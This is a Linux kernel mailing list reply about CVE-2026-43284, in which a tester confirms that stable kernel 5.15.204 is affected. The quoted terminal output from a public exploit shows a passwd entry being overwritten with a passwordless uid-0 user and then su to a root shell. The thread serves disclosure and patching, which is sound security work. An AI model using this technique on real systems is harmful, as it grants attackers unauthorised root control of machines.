From mboxrd@z Thu Jan  1 00:00:00 1970
Received: from smtp.kernel.org (aws-us-west-2-korg-mail-1.web.codeaurora.org [10.30.226.201])
	(using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits))
	(No client certificate requested)
	by smtp.subspace.kernel.org (Postfix) with ESMTPS id B641333064A
	for <linux-kernel@vger.kernel.org>; Fri,  8 May 2026 10:10:03 +0000 (UTC)
Authentication-Results: smtp.subspace.kernel.org; arc=none smtp.client-ip=10.30.226.201
ARC-Seal:i=1; a=rsa-sha256; d=subspace.kernel.org; s=arc-20240116;
	t=1778235003; cv=none; b=Jxgf7Pp3liHKHD21Dq+Tae0MCVqn8bLDREH6V9d0OCXzg8+DS/tU6zImoS8XACFSMbj3H3Cl71iGuQ/zlAiJ1EdW0+2iB45UnfyZDDwwHysXx1PH+a2wBMIwdmkKoK8BUwJEu0uKb5YYMGtafPueRw/vUeGIAWjSUeemnDciKP8=
ARC-Message-Signature:i=1; a=rsa-sha256; d=subspace.kernel.org;
	s=arc-20240116; t=1778235003; c=relaxed/simple;
	bh=s+GGwrTou1aq3uF8jOV5uw+E92MW/RXC4Sac60ExP4c=;
	h=Date:From:To:Cc:Subject:Message-ID:References:MIME-Version:
	 Content-Type:Content-Disposition:In-Reply-To; b=TlvJPyH/M1bfSgQUZV3Znb3I1b/Yb/kioqcEep9uCdBrlqOp7EA3tvQHOGGGam/VgOCJqlEG8JrYnckXgxSXb54GEXRhnfxvAuB05Yj+DrjCxuzW876pHAXg2wscLjt2A9Zhg/VXHxZzckY7lL63oC6kXURTzjE7mdFSLf94LUY=
ARC-Authentication-Results:i=1; smtp.subspace.kernel.org; dkim=pass (2048-bit key) header.d=kernel.org header.i=@kernel.org header.b=OO/Ehkif; arc=none smtp.client-ip=10.30.226.201
Authentication-Results: smtp.subspace.kernel.org;
	dkim=pass (2048-bit key) header.d=kernel.org header.i=@kernel.org header.b="OO/Ehkif"
Received: by smtp.kernel.org (Postfix) with ESMTPSA id 024ADC2BCB0;
	Fri,  8 May 2026 10:10:02 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=kernel.org;
	s=k20201202; t=1778235003;
	bh=s+GGwrTou1aq3uF8jOV5uw+E92MW/RXC4Sac60ExP4c=;
	h=Date:From:To:Cc:Subject:References:In-Reply-To:From;
	b=OO/Ehkif7LxFLAsM4oFDOVFGMo0mXu8MHHGvuXaJYoDPRHdobBK6nBTYgqaaFpP/W
	 lU14FwZhdHoUsrlf28s3c63HuUfTZRTG4YN/A1dXedlnPTYgYs1MEBKq38WsKDUFmK
	 OhqUHZEnP1rpltUOj7cBKdJAu9JhraJ9fUQ1yZN6FqTZVbm0Y3CxwD84mTrnMmggfZ
	 Mogitf55LU90TYxePkO4hF19IOJCznJa8ET+EYgMyoDyX3ZULxraZKujfYNLK+Cm//
	 5IGVzGPIDWZs2Qyvup4xW4d/tZLIABvfU4g/loGpZiTQcq6W1ngjEzbJSBDAyHHRyR
	 hytmKC0J9NIGw==
Date: Fri, 8 May 2026 12:09:58 +0200
From: Greg Kroah-Hartman <gregkh@kernel.org>
To: Massimiliano Pellizzer <mpellizzer.dev@gmail.com>
Cc: cve@kernel.org, linux-kernel@vger.kernel.org
Subject: Re: CVE-2026-43284: xfrm: esp: avoid in-place decrypt on shared skb
 frags
Message-ID: <2026050832-size-scribing-666b@gregkh>
References: <2026050856-CVE-2026-43284-6598@gregkh>
 <CALUEkOcAmYg8TjNvvgSW8VRrncshPnj2Z03Kcb8jtqBdijdXeA@mail.gmail.com>
Precedence: bulk
X-Mailing-List: linux-kernel@vger.kernel.org
List-Id: <linux-kernel.vger.kernel.org>
List-Subscribe: <mailto:linux-kernel+subscribe@vger.kernel.org>
List-Unsubscribe: <mailto:linux-kernel+unsubscribe@vger.kernel.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <CALUEkOcAmYg8TjNvvgSW8VRrncshPnj2Z03Kcb8jtqBdijdXeA@mail.gmail.com>

On Fri, May 08, 2026 at 10:57:05AM +0200, Massimiliano Pellizzer wrote:
> On Fri, May 8, 2026 at 9:24 AM Greg Kroah-Hartman
> I tested the publicly available exploit against the stable kernel 5.15.204.
> That stable branch is affected too.
> 
> ```
> $ ./run.sh
> === Stage 1 — overwrite 'systemd-timesync' line (89 bytes) with
> 'sick::0:0:<pad>:/:/bin/bash'
> === Stage 2 — verify
> sick::0:0:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:/:/bin/bash
> === Stage 3 — su - sick (empty password via PAM nullok)
> [i] state saved to /var/tmp/.cf2.state — run './run.sh --clean' to revert
> # whoami
> root
> # uname -r
> 5.15.204
> ```
> 

Yes, patches for that are being worked on right now, give me a chance to
get some lunch :)

thanks,

greg k-h